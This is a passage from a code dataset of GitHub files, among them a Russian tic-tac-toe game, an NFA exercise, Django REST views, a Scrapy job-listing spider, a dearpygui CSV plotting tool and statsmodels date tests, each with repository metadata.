rx.html(\"
\"),\n style=style.custom_margin_footer,\n text_align=\"center\",\n ),\n style=style.custom_margin_container,\n )\n\n\napp = rx.App()\napp.add_page(index)\napp.compile()\n","repo_name":"N4choCM/Nacho_GPT","sub_path":"hello_reflex/hello_reflex.py","file_name":"hello_reflex.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7966646211","text":"print(\"Крестики нолики\")\nprint(\"Также как начать игру: Во первых на верхнем столбике, есть буква и число позиции куда нужно поставить\"\n \" крестик или нолик, например T1 первое число на левой строке, M2 позиция по середине и т.д. На графе \"\n \"все местоположения показываются.\")\nprint('''Правила игры: Приветсвую вас на игре Крестики Нолики. Правила игры просты это логическая \nигра между двумя противниками на квадратном поле 3 на 3 клетки. Нужно поставить крестики или нолики \nв горизонтальном, вертикальном ввиде и по диагонале.\n''')\n\nboard = {\n 'T1': ' ', 'T2': ' ', 'T3': ' ',\n 'M1': ' ', 'M2': ' ', 'M3': ' ',\n 'D1': ' ', 'D2': ' ', 'D3': ' '\n}\n\nplayer = 1\ntotal_moves = 0\nend_check = 0\n\n\ndef check():\n if board['T1'] == 'X' and board['T2'] == 'X' and board['T3'] == 'X':\n print('Первый игрок победил!')\n return 1\n if board['M1'] == 'X' and board['M2'] == 'X' and board['M3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n if board['D1'] == 'X' and board['D2'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'X' and board['M2'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T3'] == 'X' and board['M2'] == 'X' and board['D1'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'X' and board['M1'] == 'X' and board['D1'] == 'X':\n print('Первый игрок победил!')\n return 1\n if board['T2'] == 'X' and board['M2'] == 'X' and board['D2'] == 'X':\n print('Первый игрок победил!!')\n return 1\n if board['T3'] == 'X' and board['M3'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'O' and board['T2'] == 'O' and board['T3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['M1'] == 'O' and board['M2'] == 'O' and board['M3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['D1'] == 'O' and board['D2'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['T1'] == 'O' and board['M2'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['T1'] == 'O' and board['M1'] == 'O' and board['D1'] == 'O':\n print('Второй игрок победил!')\n return 1\n if board['T2'] == 'O' and board['M2'] == 'O' and board['D2'] == 'O':\n print('Второй игрок победил!')\n return 1\n if board['T3'] == 'O' and board['M3'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n return 0\n\n\nprint('T1|T2|T3')\nprint('- +- +-')\nprint('M1|M2|M3')\nprint('- +- +-')\nprint('D1|D2|D3')\nprint('***************************')\n\nwhile True:\n print(board['T1'] + '|' + board['T2'] + '|' + board['T3'])\n print('-+-+-')\n print(board['M1'] + '|' + board['M2'] + '|' + board['M3'])\n print('-+-+-')\n print(board['D1'] + '|' + board['D2'] + '|' + board['D3'])\n end_check = check()\n if total_moves == 9 or end_check == 1:\n break\n while True:\n if player == 1:\n p1_input = input('Первый игрок')\n if p1_input.upper() in board and board[p1_input.upper()] == ' ':\n board[p1_input.upper()] = 'X'\n player = 2\n break\n\n else:\n print('Неверный индекс, Попробуйте, еще раз!')\n continue\n else:\n p2_input = input('Второй игрок')\n if p2_input.upper() in board and board[p2_input.upper()] == ' ':\n board[p2_input.upper()] = 'O'\n player = 1\n break\n else:\n print('Неверный индекс, Попробуйте, еще раз!')\n continue\n\n total_moves += 1\n print('***************************')\n print()\n","repo_name":"Akna3ap/Homeworks-Month-1-","sub_path":"Крестики нолики игра.py","file_name":"Крестики нолики игра.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10976395818","text":"import sys\nsys.stdin = open('input14888.txt', 'r')\n\n\ndef dfs(i,res,plus,minus,multi,division):\n global max_num,min_num\n if i == n:\n max_num = max(max_num,res)\n min_num = min(min_num,res)\n return\n\n if plus:\n dfs(i+1,res+nums[i], plus-1,minus,multi,division)\n if minus:\n dfs(i + 1, res - nums[i], plus, minus-1, multi, division)\n if multi:\n dfs(i + 1, res * nums[i], plus, minus, multi-1, division)\n if division:\n dfs(i + 1, int(res/nums[i]), plus, minus, multi, division-1)\n\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ncarl = list(map(int, input().split()))\nmax_num = -float('inf')\nmin_num = float('inf')\ndfs(1,nums[0],carl[0],carl[1],carl[2],carl[3])\nprint(max_num)\nprint(min_num)","repo_name":"kimsh8337/daliy-coding","sub_path":"연습/20.05/200519/BK_14888_연산자 끼워넣기.py","file_name":"BK_14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24580468128","text":"\"\"\" Write a automata code for L(M)= a + aa*b + a*b. 3. Write a automata code for Let Σ = {0,1}.\"\"\"\nfrom automata.fa.nfa import NFA\n# NFA which accepts strings that ends with 'ab'\nnfa = NFA(\n states={'q0', 'q1', 'q2', 'q3', 'q4'},\n input_symbols={'a', 'b'},\n transitions={\n 'q0': {'a': {'q1','q2'}},\n 'q1': {'a': {'q2','q4'}, 'b': {'q4'}},\n 'q2': {'a': {'q2'}, 'b': {'q3'}},\n 'q3': {},\n 'q4': {}\n },\n initial_state='q0',\n final_states={'q1','q3'}\n)\nfor i in range(1,6):\n num = input(\"Enter the string :\")\n if(nfa.accepts_input(num)):\n print(\"Accepted\")\n else:\n print(\"Rejected\")\n","repo_name":"puneeetsharma/CollageLab","sub_path":"APP Lab Sem 4/AUTOMATA PROGRAMMING/NFA/Q2-code.py","file_name":"Q2-code.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25671464948","text":"from unique_name_checker import uniqueFullNameChecker\n\ndef countUniqueNames(billFirstName, billLastName, shipFirstName, shipLastName, billNameOnCard):\n \"\"\"counts the number of unique names in a transaction\"\"\"\n counter = 3\n billFirstName.lower()\n billLastName.lower()\n shipFirstName.lower()\n shipLastName.lower()\n billNameOnCard.lower()\n FnameOnCard= '' \n MnameOnCard = '' \n LnameOnCard = ''\n\n \n \n #checks for a full name inside the bill name on card\n if len(billNameOnCard.split(' ')) == 3:\n [FnameOnCard, MnameOnCard, LnameOnCard] = billNameOnCard.split(' ')\n if uniqueFullNameChecker(FnameOnCard + \" \" + MnameOnCard, LnameOnCard, billFirstName, billLastName):\n counter-=1\n else:\n if uniqueFullNameChecker(MnameOnCard + \" \" + LnameOnCard, FnameOnCard, billFirstName, billLastName):\n counter-=1\n if uniqueFullNameChecker(FnameOnCard + \" \" + MnameOnCard, LnameOnCard, shipFirstName, shipLastName):\n counter-=1\n else:\n if uniqueFullNameChecker(MnameOnCard + \" \" + LnameOnCard, FnameOnCard, shipFirstName, shipLastName):\n counter-=1\n \n #checks for name without middle name inside the bill name on card\n if len(billNameOnCard.split(' ')) == 2:\n [FnameOnCard, LnameOnCard] = billNameOnCard.split(' ')\n if uniqueFullNameChecker(FnameOnCard,LnameOnCard, billFirstName, billLastName):\n counter -= 1\n else:\n if uniqueFullNameChecker(LnameOnCard,FnameOnCard, billFirstName, billLastName):\n counter -= 1 \n if uniqueFullNameChecker(FnameOnCard, LnameOnCard, shipFirstName, shipLastName):\n counter -= 1\n else:\n if uniqueFullNameChecker(LnameOnCard, FnameOnCard, shipFirstName, shipLastName):\n counter -= 1\n \n if uniqueFullNameChecker(billFirstName, billLastName, shipFirstName, shipLastName):\n counter-=1\n \n if counter == 3:\n return 3\n if counter == 2:\n return 2\n if counter == 1:\n return 2\n if counter == 0:\n return 1\n \n\n \n\n\n\n","repo_name":"Imrin1/Unique-names-counter","sub_path":"Unique_name_counter.py","file_name":"Unique_name_counter.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24386069968","text":"from django.http import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\n\nfrom api.models import Story\nfrom api.serializers import StorySerializer\n\n\n@csrf_exempt\ndef snippet_list(request):\n \"\"\"\n List all code snippets, or create a new snippet.\n \"\"\"\n if request.method == 'GET':\n snippets = Story.objects.all()\n serializer = StorySerializer(snippets, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = StorySerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef snippet_detail(request, title):\n \"\"\"\n Retrieve, update or delete a code snippet.\n \"\"\"\n try:\n snippet = Story.objects.get(title=title)\n except Story.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = StorySerializer(snippet)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = StorySerializer(snippet, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n snippet.delete()\n return HttpResponse(status=204)\n\n@csrf_exempt\ndef entry(request): \n html = \"

Hello Masses

\" \n return HttpResponse(html)\n\n","repo_name":"KavinJey/storytelling-api","sub_path":"stories/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72355122082","text":"import ROOT, os, SetBranch\nfrom ROOT import TChain, TFile\n\n#### Function that takes as inputs: min and max which are 2 integers that indicates from which subjob to which subjob the TChain ranges; cuts are the cuts applied to the TTrees; directory is the directory in which the subjobs are to be found and saving_directory is the directory in which the stripped files are then saved. ####\n\ndef strip_n_save (min, max, cuts, directory, saving_directory, extra_variables, particle = \"Lc\", bins = False, tree = None):\n \n if not (bins):\n filename = \"{0}2pKpiTuple.root\".format(particle)\n alldata = TChain(\"tuple_{0}2pKpi/DecayTree\".format(particle))\n extra_dir = \"\"\n for job in range(min, max) :\n alldata.Add(\"{0}/{1}{2}/{3}\".format(directory,job,extra_dir,filename))\n \n #Check if there are any issues with the data\n if (alldata.GetEntries() == 0):\n print(\"Error: entries = 0 for range \" + str(min) + \"-\" + str(max))\n return\n if (alldata.GetEntries() == -1):\n print(\"Error: entries = -1 for range \" + str(min) + \"-\" + str(max))\n return\n\n alldata = SetBranch.setBranch_funct(alldata, extra_variables)\n extra_string = \"_cluster_{0}-{1}.root\".format(min, max)\n else:\n if not (tree == None):\n alldata = tree\n extra_string = \"\"\n \n wfile = TFile.Open(saving_directory + extra_string, \"RECREATE\")\n subtree = alldata.CopyTree( cuts )\n wfile.cd()\n subtree.Write()\n wfile.Close()\n","repo_name":"jackfrost373/LHCb_Xic_production","sub_path":"analysis/Scripts/Archive/TuplesPrep_Archive/Strip.py","file_name":"Strip.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16812829514","text":"import time\nimport json\nimport _thread\nimport socket\n\nfrom core.mks import mks_config\nfrom core import co_queue\nfrom core import co_security\nfrom core import co_logger\n\nclass StaticRoutes():\n\tdef __init__(self, network, config):\n\t\tself.Config\t\t\t\t= config\n\t\tself.Users \t\t\t\t= {}\n\t\tself.Network \t\t\t= network\n\t\tself.Running \t\t\t= True\n\t\tself.UserEventsCallback\t= None\n\t\tself.Routes \t\t\t= None\n\t\n\tdef EmitEvent(self, event, info):\n\t\tif self.UserEventsCallback is not None:\n\t\t\tself.UserEventsCallback(event, info)\n\t\n\tdef CheckRoutes(self):\n\t\tif self.Routes is None:\n\t\t\treturn\n\t\t\n\t\tfor route in self.Routes:\n\t\t\tip = route[\"ip\"]\n\t\t\tport = route[\"port\"]\n\n\t\t\tinfo = self.Network.GetSocketInfoByIpPort(ip, port)\n\t\t\tif info is None:\n\t\t\t\t# Requested route is not connected\n\t\t\t\thash_key = self.Network.Connect(ip, port, None)\n\t\t\t\tif hash_key is None:\n\t\t\t\t\tif \"availabale\" in route:\n\t\t\t\t\t\tif route[\"availabale\"] is True:\n\t\t\t\t\t\t\t# Emit event route unavailable\n\t\t\t\t\t\t\tself.EmitEvent(\"disconnected\", route)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\troute[\"availabale\"] = False\n\t\t\t\t\troute[\"hash_key\"] = \"\"\n\t\t\t\telse:\n\t\t\t\t\t#if \"availabale\" in route:\n\t\t\t\t\t#\tif route[\"availabale\"] is False:\n\t\t\t\t\t#\t\t# Emit event route available\n\t\t\t\t\t#\t\tself.EmitEvent(\"connected\", route)\n\t\t\t\t\t#else:\n\t\t\t\t\t#\t# Emit event route available\n\t\t\t\t\t#\tself.EmitEvent(\"connected\", route)\n\n\t\t\t\t\troute[\"availabale\"] = True\n\t\t\t\t\troute[\"hash_key\"] = hash_key\n\t\t\t\t\tself.Network.Disconnect(ip, port)\n\t\t\t\t\tself.EmitEvent(\"connected\", route)\n\t\t\telse:\n\t\t\t\tif \"availabale\" in route:\n\t\t\t\t\t# Check info name\n\t\t\t\t\t# co_logger.LOGGER.Log(\"(StaticRoutes)# [CheckRoutes] Check info name {}:{}\".format(ip, port), 1)\n\t\t\t\t\tself.EmitEvent(\"exist\", route)\n\t\t\t\telse:\n\t\t\t\t\tco_logger.LOGGER.Log(\"(StaticRoutes)# [CheckRoutes] Connection taken {}:{}\".format(ip, port), 1)\n\t\n\tdef Run(self):\n\t\t_thread.start_new_thread(self.Worker, ())\n\n\tdef Stop(self):\n\t\tself.Running = False\n\n\tdef Worker(self):\n\t\tco_logger.LOGGER.Log(\"(StaticRoutes)# Start worker\", 1)\n\n\t\tif self.Config is None:\n\t\t\treturn False\n\t\t\n\t\tself.Routes = self.Config.Application[\"server\"][\"static\"][\"users\"]\n\t\tself.Running = True\n\t\ttime.sleep(0.5)\n\t\twhile self.Running is True:\n\t\t\tself.CheckRoutes()\n\t\t\ttime.sleep(5)","repo_name":"openmks/core-py","sub_path":"co_static_routes.py","file_name":"co_static_routes.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23214838649","text":"from data_structures_and_algorithms.challenges.queue_with_stacks.queue_with_stacks import Stack,Pseudo_queue,Node\nimport pytest\n\ndef test_Happy_Path_enqueue():\n ch11 = Pseudo_queue()\n ch11.enqueue(20)\n ch11.enqueue(15)\n ch11.enqueue(10)\n ch11.enqueue(5)\n actual=ch11.input.__str__()\n expected='-> <5>-> <10>-> <15>-> <20>'\n assert actual == expected\n # assert \"hi\"==\"hi\"\n\ndef test_Happy_Path_dequeue():\n ch11 = Pseudo_queue()\n ch11.enqueue(20)\n ch11.enqueue(15)\n ch11.enqueue(10)\n ch11.enqueue(5)\n assert ch11.dequeue()==20\n\ndef test_failure1():\n ch11 = Pseudo_queue()\n \n assert ch11.dequeue()==None\n\ndef test_failure2():\n ch11 = Pseudo_queue()\n assert ch11.dequeue()==None\n\ndef test_Edge_Case():\n ch11 = Pseudo_queue()\n ch11.enqueue(\"\")\n assert ch11.dequeue().__str__()==\"\"\n\ndef test_Edge_Case2():\n ch11 = Pseudo_queue()\n ch11.enqueue(None)\n assert ch11.dequeue()==None\n","repo_name":"maisjamil1/data-structures-and-algorithms","sub_path":"data-structures-and-algorithms/tests/challenges/test_queue_with_stacks.py","file_name":"test_queue_with_stacks.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72407300320","text":"# -*- coding: utf-8 -*-\n\nfrom behave import step, given, when, then\nfrom page_object_definitions.home import HomePage\n\n\n@step('I navigate to \"{resource}\"')\ndef navigate_url(context, resource):\n context.driver.get(context.data['Pages'][resource]['url'])\n context.driver.maximize_window()\n exec ('context.page = {}(context)'.format(resource))\n context.page.init_page_elements(context)\n\n","repo_name":"jmrn77/RyanAir","sub_path":"Test/common/steps/custom_steps.py","file_name":"custom_steps.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72539796962","text":"import dearpygui.dearpygui as dpg\nimport plot\n\n\nclass CSV_to_Plot_GUI():\n def __init__(self, plot_handler: plot.Plot_Visualizer) -> None:\n self.plot_handler = plot_handler\n self.last_plot_name = \"\"\n dpg.create_context()\n dpg.create_viewport(title='csv to plot converter')\n\n with dpg.window(label=\"CSV to image plot converter\", height=400, width=400):\n with dpg.menu_bar():\n with dpg.menu(label=\"File\"):\n dpg.add_menu_item(label=\"Open csv file\",\n callback=lambda: dpg.show_item(\"csv_file_dialog\"))\n # File manager read\n with dpg.file_dialog(directory_selector=False, show=False, callback=self.manage_file, tag=\"csv_file_dialog\", height=400):\n dpg.add_file_extension(\".csv\")\n\n dpg.add_text(\n \"Select a csv file and then press the show button to display the plots\")\n dpg.add_text(\"Selected file: \", tag=\"selected_file_text\")\n dpg.add_text(\"File preview:\", tag=\"selected_file_preview\")\n dpg.add_button(label=\"Show\",\n callback=lambda: self.convert_to_plot())\n\n dpg.add_separator()\n dpg.add_text(\n \"Max Torque value: 0 [Nm]\", tag=\"torque_max_value_field\")\n dpg.add_text(\n \"Max Voltage value: 0 [V]\", tag=\"voltage_max_value_field\")\n dpg.add_text(\n \"Max Current value: 0 [A]\", tag=\"current_max_value_field\")\n dpg.add_text(\"Max Power value: 0 [W]\", tag=\"power_max_value_field\")\n\n # Note for every plot use max 3 y axis (the fourth will be not assigned and with 5 a segmentation fault will occur)\n with dpg.window(label=\"CSV to image plot converter\", tag=\"plot_window_0\", pos=(400, 0), show=False, width=400, height=400):\n\n with dpg.plot(label=\"Torque-Current-Voltage\", height=400, width=-1):\n dpg.add_plot_legend()\n\n # create x axis\n dpg.add_plot_axis(dpg.mvXAxis, label=\"Time\")\n\n # create y axis 1: Torque\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Torque [Nm]\")\n dpg.add_line_series((), (), label=\"Torque\",\n parent=dpg.last_item(), tag=\"data_torque_0\")\n\n # # create y axis 2: Current\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Current [A]\")\n dpg.add_line_series((), (), label=\"Current\",\n parent=dpg.last_item(), tag=\"data_current\")\n\n # # create y axis 3: Voltage\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Voltage [V]\")\n dpg.add_line_series((), (), label=\"Voltage\",\n parent=dpg.last_item(), tag=\"data_voltage\")\n\n # Note for every plot use max 3 y axis (the fourth will be not assigned and with 5 a segmentation fault will occur)\n with dpg.window(label=\"CSV to image plot converter\", tag=\"plot_window_1\", pos=(400, 0), show=False, width=400, height=400):\n\n with dpg.plot(label=\"Torque-Power-Brake\", height=400, width=-1):\n dpg.add_plot_legend()\n\n # create x axis\n dpg.add_plot_axis(dpg.mvXAxis, label=\"Time\")\n\n # create y axis 1: Torque\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Torque [Nm]\")\n dpg.add_line_series((), (), label=\"Torque\",\n parent=dpg.last_item(), tag=\"data_torque_1\")\n\n # create y axis 4: Brake\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Brake [%]\")\n dpg.add_line_series((), (), label=\"Brake\",\n parent=dpg.last_item(), tag=\"data_brake\")\n\n # create y axis 5: Power\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Power [W]\")\n dpg.add_line_series((), (), label=\"Power\",\n parent=dpg.last_item(), tag=\"data_power\")\n\n dpg.setup_dearpygui()\n dpg.show_viewport()\n dpg.start_dearpygui()\n dpg.destroy_context()\n\n def manage_file(self, sender, app_data, user_data):\n \"\"\"\n Callback executed when a csv file is read\n \"\"\"\n self.last_plot_name = {app_data['file_name']}\n self.plot_handler.read_csv_vals(app_data['file_path_name'])\n dpg.set_value(\"selected_file_text\",\n f\"Selected file: : {self.last_plot_name}\")\n dpg.set_value(\"selected_file_preview\",\n f\"File preview:\\n{self.plot_handler.get_csv_head()}\\n...\\n{self.plot_handler.get_csv_tail()}\")\n dpg.set_value(\"torque_max_value_field\",\n f\"Max Torque value: {self.plot_handler.get_torque_max()} [Nm]\")\n dpg.set_value(\"voltage_max_value_field\",\n f\"Max Voltage value: {self.plot_handler.get_voltage_max()} [V]\")\n dpg.set_value(\"current_max_value_field\",\n f\"Max Current value: {self.plot_handler.get_current_max()} [A]\")\n dpg.set_value(\"power_max_value_field\",\n f\"Max Power value: {self.plot_handler.get_power_max()} [W]\")\n\n def convert_to_plot(self):\n\n dpg.set_value(\"data_torque_0\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_torque_vals()])\n dpg.set_value(\"data_torque_1\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_torque_vals()])\n dpg.set_value(\"data_brake\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_brake_vals()])\n dpg.set_value(\"data_current\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_current_vals()])\n dpg.set_value(\"data_voltage\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_voltage_vals()])\n # print(f\"PWR:{self.plot_handler.get_power_vals()}\")\n dpg.set_value(\"data_voltage\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_voltage_vals()])\n dpg.set_value(\"data_power\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_power_vals()])\n dpg.show_item(\"plot_window_0\")\n dpg.show_item(\"plot_window_1\")\n\n\nif __name__ == \"__main__\":\n try:\n plot_visualizer_instance = plot.Plot_Visualizer()\n csv_to_plot_gui_instance = CSV_to_Plot_GUI(plot_visualizer_instance)\n except Exception as e:\n print(f\"\\nSome errors occured: {e}\\r\\n\")\n","repo_name":"cannox227/Step-Motor-Test-Bench","sub_path":"GUI/src/csv_to_plot_gui.py","file_name":"csv_to_plot_gui.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28090372192","text":"import scrapy\nfrom ..items import JobsItem\nfrom ..named_entity import search_company_name\nfrom ..regex import *\n\n\nclass StackoverflowSpider(scrapy.Spider):\n name = \"stackoverflow_spider\"\n allowed_domains = []\n\n custom_settings = {\n 'CLOSESPIDER_ITEMCOUNT': 1000\n }\n\n start_urls = [\"https://stackoverflow.com/jobs?dr=BackendDeveloper\"]\n\n def parse(self, response):\n \"\"\"\n This function parses stack overflow backend jobs page\n @url https://stackoverflow.com/jobs?dr=BackendDeveloper\n @returns request to extract links\n @scrapes all jobs links\n \"\"\"\n self.logger.info(f\"Scrape Page {response.url}\")\n\n jobs_links = response.xpath(\"//div[@class='grid--cell fl1 ']\"\n \"//h2\"\n \"//a\"\n \"/@href\").getall()\n\n self.logger.info(f\"links especificos {jobs_links}, tamanho {len(jobs_links)}\")\n\n next_page = response.xpath(\"//div[@class='s-pagination']\"\n \"//a[last()]\"\n \"/@href\").get()\n\n self.logger.info(f\"next {next_page}\")\n\n if jobs_links is not None:\n yield from response.follow_all(jobs_links, callback=self.parse_job)\n\n if next_page is not None:\n yield response.follow(next_page, callback=self.parse)\n\n def parse_job(self, second_response):\n \"\"\"\n This function parses stack overflow job pages\n @returns job item\n @scrapes title, company_name, description, hiring_type, hierarchy, salary and mode\n \"\"\"\n item = JobsItem()\n\n item[\"title\"] = second_response.xpath(\n \"//h1[@class='fs-headline1 sticky:fs-body3 sticky:sm:fs-subheading t mb4 sticky:mb2']\"\n \"//a\"\n \"/@title\").get()\n\n item[\"company_name\"] = second_response.xpath(\n \"//div[@class='fc-black-700 mb4 sticky:mb0 sticky:mr8 fs-body2 sticky:fs-body1 sticky:sm:fs-caption']\"\n \"//a\"\n \"/text()\").get()\n\n item[\"description\"] = second_response.xpath(\n \"//div[@class='grid gs16 gsx sm:fd-column fs-body2 fc-medium']\"\n \"//div[@class='grid--cell6']\"\n \"//div[3]\"\n \"//span[@class='fw-bold']\"\n \"/text()\").get()\n\n html = get_html_from_response(second_response)\n item[\"hiring_type\"] = search_hiring_type(html)\n item[\"hierarchy\"] = search_hierarchy(html)\n item[\"salary\"] = search_salary(html)\n item[\"mode\"] = search_mode(html)\n item[\"url\"] = second_response.url\n\n self.logger.info(f\"Job scraped\")\n yield item\n","repo_name":"rafaelbcastilhos/webscraping-jobhunter","sub_path":"jobs/jobs/spiders/stackoverflow_spider.py","file_name":"stackoverflow_spider.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5745150065","text":"from datetime import datetime\nfrom pandas import DatetimeIndex\nimport numpy.testing as npt\nfrom statsmodels.tsa.base.datetools import (_date_from_idx,\n _idx_from_dates, date_parser, date_range_str, dates_from_str,\n dates_from_range, _infer_freq, _freq_to_pandas)\nfrom pandas import DatetimeIndex, PeriodIndex\n\ndef test_date_from_idx():\n d1 = datetime(2008, 12, 31)\n idx = 15\n npt.assert_equal(_date_from_idx(d1, idx, 'Q'), datetime(2012, 9, 30))\n npt.assert_equal(_date_from_idx(d1, idx, 'A'), datetime(2023, 12, 31))\n npt.assert_equal(_date_from_idx(d1, idx, 'B'), datetime(2009, 1, 21))\n npt.assert_equal(_date_from_idx(d1, idx, 'D'), datetime(2009, 1, 15))\n npt.assert_equal(_date_from_idx(d1, idx, 'W'), datetime(2009, 4, 12))\n npt.assert_equal(_date_from_idx(d1, idx, 'M'), datetime(2010, 3, 31))\n\ndef test_idx_from_date():\n d1 = datetime(2008, 12, 31)\n idx = 15\n npt.assert_equal(_idx_from_dates(d1, datetime(2012, 9, 30), 'Q'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2023, 12, 31), 'A'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2009, 1, 21), 'B'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2009, 1, 15), 'D'), idx)\n # move d1 and d2 forward to end of week\n npt.assert_equal(_idx_from_dates(datetime(2009, 1, 4),\n datetime(2009, 4, 17), 'W'), idx-1)\n npt.assert_equal(_idx_from_dates(d1, datetime(2010, 3, 31), 'M'), idx)\n\ndef test_regex_matching_month():\n t1 = \"1999m4\"\n t2 = \"1999:m4\"\n t3 = \"1999:mIV\"\n t4 = \"1999mIV\"\n result = datetime(1999, 4, 30)\n npt.assert_equal(date_parser(t1), result)\n npt.assert_equal(date_parser(t2), result)\n npt.assert_equal(date_parser(t3), result)\n npt.assert_equal(date_parser(t4), result)\n\ndef test_regex_matching_quarter():\n t1 = \"1999q4\"\n t2 = \"1999:q4\"\n t3 = \"1999:qIV\"\n t4 = \"1999qIV\"\n result = datetime(1999, 12, 31)\n npt.assert_equal(date_parser(t1), result)\n npt.assert_equal(date_parser(t2), result)\n npt.assert_equal(date_parser(t3), result)\n npt.assert_equal(date_parser(t4), result)\n\ndef test_dates_from_range():\n results = [datetime(1959, 3, 31, 0, 0),\n datetime(1959, 6, 30, 0, 0),\n datetime(1959, 9, 30, 0, 0),\n datetime(1959, 12, 31, 0, 0),\n datetime(1960, 3, 31, 0, 0),\n datetime(1960, 6, 30, 0, 0),\n datetime(1960, 9, 30, 0, 0),\n datetime(1960, 12, 31, 0, 0),\n datetime(1961, 3, 31, 0, 0),\n datetime(1961, 6, 30, 0, 0),\n datetime(1961, 9, 30, 0, 0),\n datetime(1961, 12, 31, 0, 0),\n datetime(1962, 3, 31, 0, 0),\n datetime(1962, 6, 30, 0, 0)]\n dt_range = dates_from_range('1959q1', '1962q2')\n npt.assert_(results == dt_range)\n\n # test with starting period not the first with length\n results = results[2:]\n dt_range = dates_from_range('1959q3', length=len(results))\n npt.assert_(results == dt_range)\n\n # check month\n results = [datetime(1959, 3, 31, 0, 0),\n datetime(1959, 4, 30, 0, 0),\n datetime(1959, 5, 31, 0, 0),\n datetime(1959, 6, 30, 0, 0),\n datetime(1959, 7, 31, 0, 0),\n datetime(1959, 8, 31, 0, 0),\n datetime(1959, 9, 30, 0, 0),\n datetime(1959, 10, 31, 0, 0),\n datetime(1959, 11, 30, 0, 0),\n datetime(1959, 12, 31, 0, 0),\n datetime(1960, 1, 31, 0, 0),\n datetime(1960, 2, 28, 0, 0),\n datetime(1960, 3, 31, 0, 0),\n datetime(1960, 4, 30, 0, 0),\n datetime(1960, 5, 31, 0, 0),\n datetime(1960, 6, 30, 0, 0),\n datetime(1960, 7, 31, 0, 0),\n datetime(1960, 8, 31, 0, 0),\n datetime(1960, 9, 30, 0, 0),\n datetime(1960, 10, 31, 0, 0),\n datetime(1960, 12, 31, 0, 0),\n datetime(1961, 1, 31, 0, 0),\n datetime(1961, 2, 28, 0, 0),\n datetime(1961, 3, 31, 0, 0),\n datetime(1961, 4, 30, 0, 0),\n datetime(1961, 5, 31, 0, 0),\n datetime(1961, 6, 30, 0, 0),\n datetime(1961, 7, 31, 0, 0),\n datetime(1961, 8, 31, 0, 0),\n datetime(1961, 9, 30, 0, 0),\n datetime(1961, 10, 31, 0, 0)]\n\n dt_range = dates_from_range(\"1959m3\", length=len(results))\n\n\ndef test_infer_freq():\n d1 = datetime(2008, 12, 31)\n d2 = datetime(2012, 9, 30)\n\n b = 